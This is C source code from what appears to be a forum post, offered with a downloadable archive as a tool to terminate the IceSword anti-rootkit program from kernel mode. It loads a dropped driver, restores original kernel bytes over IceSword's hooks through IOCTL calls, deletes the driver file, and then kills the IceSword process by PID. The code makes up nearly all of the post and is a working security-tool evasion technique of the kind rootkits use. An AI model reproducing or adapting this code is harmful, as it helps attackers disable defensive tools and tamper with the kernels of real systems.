code:
#include "stdafx.h"
#include "NtQuerySystemInformation.h"
#include "Driver.h"
#include "resource.h"
#include "ObjectKill.h"
#include <stdio.h>
#include <conio.h>
#include <windows.h>
#include <winioctl.h>
//Link Device
#define IOCTL_GETADDR_CONTROL CTL_CODE(FILE_DEVICE_UNKNOWN,0x900,METHOD_BUFFERED,FILE_ANY_ACCESS)
#define IOCTL_INPUTCODE_CONTROL CTL_CODE(FILE_DEVICE_UNKNOWN,0x905,METHOD_BUFFERED,FILE_ANY_ACCESS)
#define IOCTL_INPUTADDR_CONTROL CTL_CODE(FILE_DEVICE_UNKNOWN,0x910,METHOD_BUFFERED,FILE_ANY_ACCESS)
#define IOCTL_INPUTBYTECOUNT_CONTROL CTL_CODE(FILE_DEVICE_UNKNOWN,0x915,METHOD_BUFFERED,FILE_ANY_ACCESS)
PUCHAR GetNTOriCode(ULONG NTBeginKrnlAddress,ULONG ByteCount);
void PatchHighMemory(LONG NtBeginAddr,LONG KrnlByteCount);
HANDLE hDevice;
int main(int argc, char* argv[])
{
char DeviceRet[25];
DWORD ReBytes; //驱动数据交换返回值
memset(DeviceRet,0,4);
ULONG NtAddr;
ULONG ByteCount;
ULONG BeginKrnlAddr;
FreeSYS();
hDevice = LoadDriver("C:\\KillIS.sys");
memset(DeviceRet,0,4);
DeviceIoControl(hDevice,IOCTL_GETADDR_CONTROL,0,0,DeviceRet,4,&ReBytes,NULL);
NtAddr = atol(DeviceRet);
BeginKrnlAddr = NtAddr; //得到开始地址
ByteCount = 10; //获取更改代码的个数
PatchHighMemory(NtAddr,ByteCount);
UnloadDriver(hDevice);
DeleteFile("C:\\KillIS.sys");
LONG pid;
printf("\n请输入冰刃的PID值:");
scanf("%ld",&pid);
ObjectKill(pid);
return 0;
}
void PatchHighMemory(LONG NtBeginAddr,LONG KrnlByteCount)
{
//device var
char DeviceRet[25];
DWORD ReBytes; //驱动数据交换返回值
memset(DeviceRet,0,4);
PUCHAR ByteWrite;
PUCHAR Code;
printf("高位内存起始地址:0x%0.8X 数目:0x%0.8X\n",NtBeginAddr,KrnlByteCount);
Code = GetNTOriCode(NtBeginAddr,KrnlByteCount);
if(!Code) exit(0);
ByteWrite = Code; //得到原始代码地址
printf("开始反补丁");
//输入要更改的BeginKrnlAddr数据
DeviceIoControl(hDevice,IOCTL_INPUTADDR_CONTROL,&NtBeginAddr,sizeof(ULONG),0,0,&ReBytes,NULL);
//输入要更改的ByteCount数据
DeviceIoControl(hDevice,IOCTL_INPUTBYTECOUNT_CONTROL,&KrnlByteCount,sizeof(ULONG),0,0,&ReBytes,NULL);
//输入要更改的Byte数据,并开始更改
DeviceIoControl(hDevice,IOCTL_INPUTCODE_CONTROL,ByteWrite,KrnlByteCount*sizeof(UCHAR),0,0,&ReBytes,NULL);
}
PUCHAR GetNTOriCode(ULONG NTBeginKrnlAddress,ULONG ByteCount)
{
HINSTANCE hNTDll;
ULONG nRet;
ULONG nQuerySize;
ULONG Success;
PSYSMODULELIST pModInfo = NULL;
//获取NtQuerySystemInformation
hNTDll = LoadLibrary("ntdll");
NtQuerySystemInformation = (NTQUERYSYSTEMINFORMATION)GetProcAddress(hNTDll,"NtQuerySystemInformation");
FreeLibrary(hNTDll);
//获取内核模块
Success = NtQuerySystemInformation(SystemModuleInfo,NULL,0,&nQuerySize);
pModInfo = (PSYSMODULELIST)malloc(nQuerySize);
Success = NtQuerySystemInformation(SystemModuleInfo,pModInfo,nQuerySize,&nRet);
if( Success < 0 )
{
free( pModInfo );
pModInfo = NULL;
}
if( NTBeginKrnlAddress >= (ULONG)pModInfo->smi->Size+(ULONG)pModInfo->smi->Base )
return 0;
HMODULE hKernel;
PUCHAR buf;
buf = (PUCHAR)malloc(ByteCount);
ULONG FileOffset = NTBeginKrnlAddress-(ULONG)(pModInfo->smi->Base);
hKernel = LoadLibraryEx(pModInfo->smi->ImageName+pModInfo->smi->ModuleNameOffset,0,DONT_RESOLVE_DLL_REFERENCES);
for(int c=0;c<ByteCount;c++) //拷贝数据
memcpy(buf+c,(PUCHAR)((ULONG)hKernel+FileOffset+c),sizeof(UCHAR));
return buf; //返回指针
}
______________________
附件是完整代码
下载地址
内核模式结束冰刃进程.rar
